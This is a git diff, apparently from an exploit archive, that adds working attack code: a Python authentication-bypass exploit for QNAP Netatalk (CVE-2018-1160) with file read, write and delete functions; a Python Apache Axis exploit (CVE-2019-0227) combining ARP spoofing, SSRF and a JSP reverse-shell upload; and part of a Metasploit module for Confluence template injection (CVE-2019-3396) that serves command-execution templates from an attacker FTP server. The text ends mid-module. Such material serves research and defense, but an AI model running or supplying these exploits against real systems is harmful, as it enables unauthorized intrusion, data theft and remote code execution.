+    frame #5: 0x0000555cf7b3e9fa chrome`v8::internal::Execution::TryRunMicrotasks(v8::internal::Isolate*, v8::internal::MicrotaskQueue*, v8::internal::MaybeHandle<v8::internal::Object>*) + 74
+    frame #6: 0x0000555cf7c8042b chrome`v8::internal::MicrotaskQueue::RunMicrotasks(v8::internal::Isolate*) + 427
+    frame #7: 0x0000555cfb5c13ba chrome`blink::Microtask::PerformCheckpoint(v8::Isolate*) + 58
+    frame #8: 0x0000555cfc5cc301 chrome`blink::(anonymous namespace)::EndOfTaskRunner::DidProcessTask(base::PendingTask const&) + 17
+-->
\ No newline at end of file
diff --git a/exploits/multiple/remote/46675.py b/exploits/multiple/remote/46675.py
new file mode 100755
index 000000000..946dba48e
--- /dev/null
+++ b/exploits/multiple/remote/46675.py
@@ -0,0 +1,309 @@
+##
+# Exploit Title: QNAP Netatalk Authentication Bypass
+# Date: 12/20/2018
+# Original Exploit Author: Jacob Baines
+# Modifications for QNAP devices: Mati Aharoni
+# Vendor Homepage: http://netatalk.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/netatalk/files/
+# Version: Before 3.1.12
+# CVE : CVE-2018-1160
+# Advisory: https://www.tenable.com/security/research/tra-2018-48
+# Tested on latest firmware as of Feb 1st 2019: 	
+#	QNAP TS-X85U (TS-X85U_20181228-4.3.6.0805)
+#	QNAP TS-X73U (TS-X73U_20181228-4.3.6.0805)
+#	QNAP TS-X77U (TS-X77U_20181228-4.3.6.0805)
+#	QNAP TS-X88  (TS-X88_20190119-4.4.0.0820)
+##
+import argparse
+import socket
+import struct
+import sys
+
+# Known addresses:
+# This exploit was written against a Netatalk compiled for a
+# QNAP TS-1273-RP and possibly works on other models. 
+# The addresses below may need be changed for different QNAP targets.
+
+preauth_switch_base = '\x80\xf5\x64\x00\x00\x00\x00\x00' # 0x64f580
+afp_getsrvrparms = '\xd3\xa3\x43\x00\x00\x00\x00\x00' # 0x43a3d3
+afp_openvol = '\xc2\xab\x43\x00\x00\x00\x00\x00'  # 0x43abc2
+afp_enumerate_ext2 = '\x49\xf8\x41\x00\x00\x00\x00\x00' # 0x41f849
+afp_openfork = '\xa3\xa5\x42\x00\x00\x00\x00\x00' # 0x42a5a3
+afp_read_ext = '\x4b\xc1\x42\x00\x00\x00\x00\x00' # 0x42c14b
+afp_createfile = '\x10\x40\x42\x00\x00\x00\x00\x00' # 0x424010
+afp_write_ext = '\x9f\xd1\x42\x00\x00\x00\x00\x00' # 0x42d19f
+afp_delete = '\x1e\x93\x42\x00\x00\x00\x00\x00' # 0x42931e
+
+##
+# This is the actual exploit. Overwrites the commands pointer
+# with the base of the preauth_switch
+##
+def do_exploit(sock):
+	print "[+] Sending exploit to overwrite preauth_switch data."
+	data = '\x00\x04\x00\x01\x00\x00\x00\x00'
+	data += '\x00\x00\x00\x1a\x00\x00\x00\x00'
+	data += '\x01' # attnquant in open sess
+	data += '\x18' # attnquant size
+	data += '\xad\xaa\xaa\xba' # overwrites attn_quantum (on purpose)
+	data += '\xef\xbe\xad\xde' # overwrites datasize
+	data += '\xfe\xca\x1d\xc0' # overwrites server_quantum 
+	data += '\xce\xfa\xed\xfe' # overwrites the server id and client id
+	data += preauth_switch_base # overwrite the commands ptr
+	sock.sendall(data)
+
+	# don't really care about the respone
+	resp = sock.recv(1024)
+	return
+
+
+##
+# Sends a request to the server.
+#
+# @param socket the socket we are writing on
+# @param request_id two bytes. requests are tracked through the session
+# @param address the address that we want to jump to
+# @param param_string the params that the address will need
+##
+def send_request(socket, request_id, address, param_string):
+    data = '\x00' # flags
+    data += '\x02' # command
+    data += request_id
+    data += '\x00\x00\x00\x00' # data offset
+    data += '\x00\x00\x00\x90' # cmd length <=== always the same
+    data += '\x00\x00\x00\x00' # reserved
+    # ==== below gets copied into dsi->cmd =====
+    data += '\x11' # use the 25th entry in the pre_auth table. We'll write the function to execute there
+    data += '\x00' # pad
+    if (param_string == False):
+        data += ("\x00" * 134)
+    else:
+        data += param_string
+        data += ("\x00" * (134 - len(param_string)))
+
+    data += address # we'll jump to this address
+
+    sock.sendall(data)
+    return
+
+##
+# Parses the DSI header. If we don't get the expected request id
+# then we bail out.
+##
+def parse_dsi(payload, expected_req_id):
+	(flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
+	if command != 8:
+		if flags != 1 or command != 2 or req_id != expected_req_id:
+			print '[-] Bad DSI Header: %u %u %u' % (flags, command, req_id)
+			sys.exit(0)
+
+		if error_code != 0 and error_code != 4294962287:
+			print '[-] The server responded to with an error code: ' + str(error_code)
+			sys.exit(0)
+
+	afp_data = payload[16:]
+	if len(afp_data) != length:
+		if command != 8:
+			print '[-] Invalid length in DSI header: ' + str(length) + ' vs. ' + str(len(payload))
+			sys.exit(0)
+		else:
+			afp_data = afp_data[length:]
+			afp_data = parse_dsi(afp_data, expected_req_id)
+
+	return afp_data
+
+##
+# List all the volumes on the remote server
+##
+def list_volumes(sock):
+	print "[+] Listing volumes"
+	send_request(sock, "\x00\x01", afp_getsrvrparms, "")
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 1)
+	(server_time, volumes) = struct.unpack_from('>IB', afp_data)
+	print "[+] " + str(volumes) + " volumes are available:"
+
+	afp_data = afp_data[5:]
+	for i in range(volumes):
+		string_length = struct.unpack_from('>h', afp_data)
+		name = afp_data[2 : 2 + string_length[0]]
+		print "\t-> " + name
+		afp_data = afp_data[2 + string_length[0]:]
+
+	return
+
+##
+# Open a volume on the remote server
+##
+def open_volume(sock, request, params):
+	send_request(sock, request, afp_openvol, params)
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 1)
+	(bitmap, vid) = struct.unpack_from('>HH', afp_data)
+	return vid
+
+##
+# List the contents of a specific volume
+##
+def list_volume_content(sock, name):
+	print "[+] Listing files in volume " + name
+
+	# open the volume
+	length = struct.pack("b", len(name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + length + name)
+	print "[+] Volume ID is " + str(vid)
+
+	# enumerate
+	packed_vid = struct.pack(">h", vid)
+	send_request(sock, "\x00\x02", afp_enumerate_ext2, packed_vid + "\x00\x00\x00\x02\x01\x40\x01\x40\x07\xff\x00\x00\x00\x01\x7f\xff\xff\xff\x02\x00\x00\x00")
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 2)
+	(f_bitmap, d_bitmap, req_count) = struct.unpack_from('>HHH', afp_data)
+	afp_data = afp_data[6:]
+
+	print "[+] Files (%u):" % req_count
+	for i in range(req_count):
+		(length, is_dir, pad, something, file_id, name_length) = struct.unpack_from('>HBBHIB', afp_data)
+		name = afp_data[11:11+name_length]
+		if is_dir:
+			print "\t[%u] %s/" % (file_id, name)
+		else:
+			print "\t[%u] %s" % (file_id, name)
+		afp_data = afp_data[length:]
+
+##
+# Read the contents of a specific file.
+##
+def cat_file(sock, vol_name, file_name):
+	print "[+] Cat file %s in volume %s" % (file_name, vol_name)
+
+	# open the volume
+	vol_length = struct.pack("b", len(vol_name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
+	print "[+] Volume ID is " + str(vid)
+
+	# open fork
+	packed_vid = struct.pack(">h", vid)
+	file_length = struct.pack("b", len(file_name))
+	send_request(sock, "\x00\x02", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 2)
+	(f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
+	print "[+] Fork ID: %s" % (fork_id)
+
+	# read file
+	packed_fork = struct.pack(">h", fork_id)
+	send_request(sock, "\x00\x03", afp_read_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x03\x00")
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 3)
+	print "[+] File contents:"
+	print afp_data
+
+##
+# Create a file on the remote volume
+## 
+def write_file(sock, vol_name, file_name, data):
+	print "[+] Writing to %s in volume %s" % (file_name, vol_name)
+
+	# open the volume
+	vol_length = struct.pack("B", len(vol_name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
+	print "[+] Volume ID is " + str(vid)
+
+	# create the file
+	packed_vid = struct.pack(">H", vid)
+	file_length = struct.pack("B", len(file_name))
+	send_request(sock, "\x00\x02", afp_createfile, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
+	resp = sock.recv(1024)
+	afp_data = parse_dsi(resp, 2)
+
+	if len(afp_data) != 0:
+		sock.recv(1024)
+
+	# open fork
+	packed_vid = struct.pack(">H", vid)
+	file_length = struct.pack("B", len(file_name))
+	send_request(sock, "\x00\x03", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 3)
+	(f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
+	print "[+] Fork ID: %s" % (fork_id)
+
+	# write
+	packed_fork = struct.pack(">H", fork_id)
+	data_length = struct.pack(">Q", len(data))
+	send_request(sock, "\x00\x04", afp_write_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + data_length + data)
+	#resp = sock.recv(1024)
+
+	sock.send(data + ("\x0a"*(144 - len(data))))
+	resp = sock.recv(1024)
+	afp_data = parse_dsi(resp, 4)
+	print "[+] Fin"
+
+##
+# Delete a file on the remote volume
+##
+def delete_file(sock, vol_name, file_name):
+	print "[+] Deleting %s from volume %s" % (file_name, vol_name)
+
+	# open the volume
+	vol_length = struct.pack("B", len(vol_name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
+	print "[+] Volume ID is " + str(vid)
+
+	# delete the file
+	packed_vid = struct.pack(">H", vid)
+	file_length = struct.pack("B", len(file_name))
+	send_request(sock, "\x00\x02", afp_delete, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
+	resp = sock.recv(1024)
+	afp_data = parse_dsi(resp, 2)
+
+	print "[+] Fin"
+
+##
+##
+## Main
+##
+##
+
+top_parser = argparse.ArgumentParser(description='I\'m a little pea. I love the sky and the trees.')
+top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
+top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="548")
+top_parser.add_argument('-lv', '--list-volumes', action="store_true", dest="lv", help="List the volumes on the remote target.")
+top_parser.add_argument('-lvc', '--list-volume-content', action="store_true", dest="lvc", help="List the content of a volume.")
+top_parser.add_argument('-c', '--cat', action="store_true", dest="cat", help="Dump contents of a file.")
+top_parser.add_argument('-w', '--write', action="store_true", dest="write", help="Write to a new file.")
+top_parser.add_argument('-f', '--file', action="store", dest="file", help="The file to operate on")
+top_parser.add_argument('-v', '--volume', action="store", dest="volume", help="The volume to operate on")
+top_parser.add_argument('-d', '--data', action="store", dest="data", help="The data to write to the file")
+top_parser.add_argument('-df', '--delete-file', action="store_true", dest="delete_file", help="Delete a file")
+args = top_parser.parse_args()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
+sock.connect((args.ip, args.port))
+print "[+] Connected!"
+
+do_exploit(sock)
+if args.lv:
+	list_volumes(sock)
+elif args.lvc and args.volume != None:
+	list_volume_content(sock, args.volume)
+elif args.cat and args.file != None and args.volume != None:
+	cat_file(sock, args.volume, args.file)
+elif args.write and args.volume != None and args.file != None and args.data != None:
+	if len(args.data) > 144:
+		print "This implementation has a max file writing size of 144"
+		sys.exit(0)
+	write_file(sock, args.volume, args.file, args.data)
+elif args.delete_file and args.volume != None and args.file != None:
+	delete_file(sock, args.volume, args.file)
+else:
+	print("Bad args")
+
+sock.close()
\ No newline at end of file
diff --git a/exploits/multiple/remote/46682.py b/exploits/multiple/remote/46682.py
new file mode 100755
index 000000000..2f785428d
--- /dev/null
+++ b/exploits/multiple/remote/46682.py
@@ -0,0 +1,111 @@
+#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
+#	Apache Axis 1.4 Remote Code Execution CVE-2019-0227                                             #
+#https://rhinosecuritylabs.com/Application-Security/CVE-2019-0227-Expired-Domain-to-RCE-in-Apache-Axis  #
+#	Author: David Yesland @daveysec, Rhino Security Labs				                #
+#	This exploits Apache Axis < 1.4 to upload and execute a JSP payload using MITM                  #
+#	by forcing an http request using the default StockQuoteService.jws service.                     #
+#       You need to be on the same network as the Axis server to make this work.                        #
+#	A lot of this exploit is based on the research from:                                            #
+#	https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce                                      #
+#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
+
+import SimpleHTTPServer
+import SocketServer
+import subprocess
+from time import sleep
+import thread
+import requests
+from urllib import quote_plus
+import sys
+
+#Usage: python CVE-2019-0227.py shell.jsp
+
+#You need to change these variable to match your configuration
+myip = "192.168.0.117" #IP of your machine
+target = "192.168.0.102" #IP of target
+gateway = "192.168.0.1" #default gateway
+targetport = "8080" #Port of target running axis (probably 8080)
+pathtoaxis = "http://192.168.0.102:8080/axis" #This can be custom depending on the Axis install, but this is default
+spoofinterface = "eth0" #Interface for arpspoofing
+jspwritepath = "webapps\\axis\\exploit.jsp" #relative path on the target to write the JSP payload This is the default on a Tomcat install
+
+#msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
+payloadfile = open(sys.argv[1],'r').read() #Some file containing a JSP payload
+
+#craft URL to deploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
+deployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22+provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler+type%3D%22RandomLog%22%2F%3E%3C%2FrequestFlow%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22java.util.Random%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22+%3E%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22'+quote_plus(jspwritepath)+'%22+%2F%3E%3Cparameter+name%3D%22LogHandler.writeToConsole%22+value%3D%22false%22+%2F%3E%3C%2Fhandler%3E%3C%2Fns1%3Adeployment'
+
+#craft URL to undeploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
+undeployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Aundeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22%2F%3E%3C%2Fns1%3Aundeployment'
+
+
+def CreateJsp(pathtoaxis,jsppayload):
+    url = pathtoaxis+"/services/exploitservice"
+    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "something", "Content-Type": "text/xml;charset=UTF-8"}
+    data="<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n        <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n        xmlns:api=\"http://127.0.0.1/Integrics/Enswitch/API\"\r\n        xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\n        xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n        <soapenv:Body>\r\n        <api:main\r\n        soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n            <api:in0><![CDATA[\r\n"+jsppayload+"\r\n]]>\r\n            </api:in0>\r\n        </api:main>\r\n  </soapenv:Body>\r\n</soapenv:Envelope>"
+    requests.post(url, headers=headers, data=data)
+
+def TriggerSSRF(pathtoaxis):
+    url = pathtoaxis+"/StockQuoteService.jws"
+    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "", "Content-Type": "text/xml;charset=UTF-8"}
+    data="<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:def=\"http://DefaultNamespace\">\r\n   <soapenv:Header/>\r\n   <soapenv:Body>\r\n      <def:getQuote soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n         <symbol xsi:type=\"xsd:string\">dwas</symbol>\r\n      </def:getQuote>\r\n   </soapenv:Body>\r\n</soapenv:Envelope>"
+    requests.post(url, headers=headers, data=data)
+
+
+def StartMitm(interface,target,gateway):
+	subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward",shell=True)#Enable forwarding
+	subprocess.Popen("arpspoof -i {} -t {} {}".format(interface,target,gateway),shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)#spoof target -> gateway
+	subprocess.Popen("iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)#use iptable to redirect back to our web server
+
+
+def KillMitm(target,myip):
+	subprocess.Popen("pkill arpspoof",shell=True)
+	subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward",shell=True)
+	subprocess.Popen("iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)
+
+
+def SSRFRedirect(new_path):
+	class myHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
+	   def do_GET(self):
+	       self.send_response(301)
+	       self.send_header('Location', new_path)
+	       self.end_headers()
+	PORT = 80
+	SocketServer.TCPServer.allow_reuse_address = True
+	handler = SocketServer.TCPServer(("", PORT), myHandler)
+	print "[+] Waiting to redirect"
+	handler.handle_request()
+	print "[+] Payload URL sent"
+
+
+def ExecuteJsp(pathtoaxis):
+	subprocess.Popen("curl "+pathtoaxis+"/exploit.jsp",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+
+print "[+] Starting MITM"
+StartMitm(spoofinterface,target,gateway)
+sleep(2)
+
+print "[+] Starting web server for SSRF"
+thread.start_new_thread(SSRFRedirect,(deployurl,))
+
+print "[+] Using StockQuoteService.jws to trigger SSRF"
+TriggerSSRF(pathtoaxis)
+print "[+] Waiting 3 seconds for incoming request"
+sleep(3)
+
+print "[+] Writing JSP payload"
+CreateJsp(pathtoaxis,payloadfile)
+
+print "[+] Cleaning up exploit service"
+thread.start_new_thread(SSRFRedirect,(undeployurl,))
+TriggerSSRF(pathtoaxis)
+
+print "[+] Cleaning up man in the middle"
+KillMitm(target,myip)
+
+print "[+] Waiting 2 seconds for JSP write"
+sleep(2)
+ExecuteJsp(pathtoaxis)
+
+print "[+] Default URL to the jsp payload:"
+print pathtoaxis+"/exploit.jsp"
\ No newline at end of file
diff --git a/exploits/multiple/remote/46731.rb b/exploits/multiple/remote/46731.rb
new file mode 100755
index 000000000..3c68146c1
--- /dev/null
+++ b/exploits/multiple/remote/46731.rb
@@ -0,0 +1,465 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::FtpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
+      'Description'    => %q{
+        Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
+        allows embed online videos, slideshows, photostreams and more directly into page.
+        A _template parameter can be used to inject remote Java code into a Velocity template,
+        and gain code execution. Authentication is unrequired to exploit this vulnerability.
+        By default, Java payload will be used because it is cross-platform, but you can also
+        specify which native payload you want (Linux or Windows).
+
+        Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
+        6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
+
+        This vulnerability was originally discovered by Daniil Dmitriev
+        https://twitter.com/ddv_ua.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Daniil Dmitriev',                # Discovering vulnerability
+          'Dmitry (rrock) Shchannikov'      # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-3396' ],
+          [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
+          [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
+          [ 'URL', 'https://paper.seebug.org/886/']
+        ],
+      'Targets'        =>
+        [
+          [ 'Java',    { 'Platform' => 'java',  'Arch' => ARCH_JAVA }],
+          [ 'Windows', { 'Platform' => 'win',   'Arch' => ARCH_X86  }],
+          [ 'Linux',   { 'Platform' => 'linux', 'Arch' => ARCH_X86  }]
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8090,
+          'SRVPORT' => 8021,
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 25 2019',
+      'DefaultTarget'  => 0,
+      'Stance'         => Msf::Exploit::Stance::Aggressive
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+        OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
+          'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+      ])
+  end
+
+  # Handles ftp RETP command.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] RETR argument.
+  # @return [void]
+  def on_client_command_retr(c, arg)
+    vprint_status("FTP download request for #{arg}")
+    conn = establish_data_connection(c)
+    if(not conn)
+      c.put("425 Can't build data connection\r\n")
+      return
+    end
+
+    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+    case arg
+    when /check\.vm$/
+      conn.put(wrap(get_check_vm))
+    when /javaprop\.vm$/
+      conn.put(wrap(get_javaprop_vm))
+    when /upload\.vm$/
+      conn.put(wrap(get_upload_vm))
+    when /exec\.vm$/
+      conn.put(wrap(get_exec_vm))
+    else
+      conn.put(wrap(get_dummy_vm))
+    end
+    c.put("226 Transfer complete.\r\n")
+    conn.close
+  end
+
+  # Handles ftp PASS command to suppress output.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] PASS argument.
+  # @return [void]
+  def on_client_command_pass(c, arg)
+    @state[c][:pass] = arg
+    vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
+    c.put "230 Login OK\r\n"
+  end
+
+  # Handles ftp EPSV command to suppress output.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] EPSV argument.
+  # @return [void]
+  def on_client_command_epsv(c, arg)
+    vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
+    c.put("500 'EPSV #{arg}': command not understood.\r\n")
+  end
+
+  # Returns a upload template.
+  #
+  # @return [String]
+  def get_upload_vm
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
+      EOF
+    )
+  end
+
+  # Returns a command execution template.
+  #
+  # @return [String]
+  def get_exec_vm
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
+      EOF
+    )
+  end
+
+  # Returns checking template.
+  #
+  # @return [String]
+  def get_check_vm
+    (
+      <<~EOF
+        #{@check_text}
+      EOF
+    )
+  end
+
+  # Returns Java's getting property template.
+  #
+  # @return [String]
+  def get_javaprop_vm
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
+      EOF
+    )
+  end
+
+  # Returns dummy template.
+  #
+  # @return [String]
+  def get_dummy_vm
+    (
+      <<~EOF
+      EOF
+    )
+  end
+
+  # Checks the vulnerability.
+  #
+  # @return [Array] Check code
+  def check
+    checkcode = Exploit::CheckCode::Safe
+    begin
+      # Start the FTP service
+      print_status("Starting the FTP server.")
+      start_service
+
+      @check_text = Rex::Text.rand_text_alpha(5..10)
+      res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+      if res && res.body && res.body.include?(@check_text)
+        checkcode = Exploit::CheckCode::Vulnerable
+      end
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      checkcode = Exploit::CheckCode::Unknown
+    end
+    checkcode
+  end
+
+  # Injects Java code to the template.
+  #
+  # @param service_url [String] Address of template to injection.
+  # @return [void]
+  def inject_template(service_url, timeout=20)
+
+    uri  = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'headers' => {
+        'Accept' => '*/*',
+        'Origin' => full_uri(vhost_uri: true)
+      },
+      'ctype'  => 'application/json; charset=UTF-8',
+      'data'   => {
+                    'contentId' => '1',
+                    'macro' => {
+                      'name' => 'widget',
+                      'body' => '',
+                      'params' => {
+                        'url' => datastore['TRIGGERURL'],
+                        '_template' => service_url
+                      }
+
+                    }
+                  }.to_json
+    }, timeout=timeout)
+
+    unless res
+      unless service_url.include?("exec.vm")
+        print_warning('Connection timed out in #inject_template')
+      end
+      return
+    end
+
+    if res.body.include? 'widget-error'
+      print_error('Failed to inject and execute code:')
+    else
+      vprint_status("Server response:")
+    end
+
+    vprint_line(res.body)
+
+    res
+  end
+
+  # Returns a system property for Java.
+  #
+  # @param prop [String] Name of the property to retrieve.
+  # @return [String]
+  def get_java_property(prop)
+    @prop = prop
+    res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+    if res && res.body
+      return clear_response(res.body)
+    end
+    ''
+  end
+
+  # Returns the target platform.
+  #
+  # @return [String]
+  def get_target_platform
+    return get_java_property('os.name')
+  end
+
+  # Checks if the target os/platform is compatible with the module target or not.
+  #
+  # @return [TrueClass] Compatible
+  # @return [FalseClass] Not compatible
+  def target_platform_compat?(target_platform)
+    target.platform.names.each do |n|
+      if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)
+        return true
+      end
+    end
+
+    false
+  end
+
+  # Returns a temp path from the remote target.
+  #
+  # @return [String]
+  def get_tmp_path
+    return get_java_property('java.io.tmpdir')
+  end
+
+  # Returns the Java home path used by Confluence.
+  #
+  # @return [String]
+  def get_java_home_path
+    return get_java_property('java.home')
+  end
+
+  # Returns Java code that can be used to inject to the template in order to copy a file.
+  #
+  # @note The purpose of this method is to have a file that is not busy, so we can execute it.
+  #       It is meant to be used with #get_write_file_code.
+  #
+  # @param fname [String] The file to copy
+  # @param new_fname [String] The new file
+  # @return [void]
+  def get_dup_file_code(fname, new_fname)
+    if fname =~ /^\/[[:print:]]+/
+      @command = "cp #{fname} #{new_fname}"
+    else
+      @command = "cmd.exe /C copy #{fname} #{new_fname}"
+    end
+
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+  end
+
+  # Returns the normalized file path for payload.
+  #
+  # @return [String]
+  def normalize_payload_fname(tmp_path, fname)
+    # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
+    if /^\/[[:print:]]+/ === tmp_path
+      Rex::FileUtils.normalize_unix_path(tmp_path, fname)
+    else
+      Rex::FileUtils.normalize_win_path(tmp_path, fname)
+    end
+  end
+
+  # Exploits the target in Java platform.
+  #
+  # @return [void]
+  def exploit_as_java
+
+    tmp_path = get_tmp_path
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    @fname    = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
+    @b64      = Rex::Text.encode_base64(payload.encoded_jar)
+    @command   = ''
+
+    java_home = get_java_home_path
+
+    if java_home.blank?
+      fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
+    else
+      vprint_status("Found Java home path: #{java_home}")
+    end
+
+    register_files_for_cleanup(@fname)
+
+    if /^\/[[:print:]]+/ === @fname
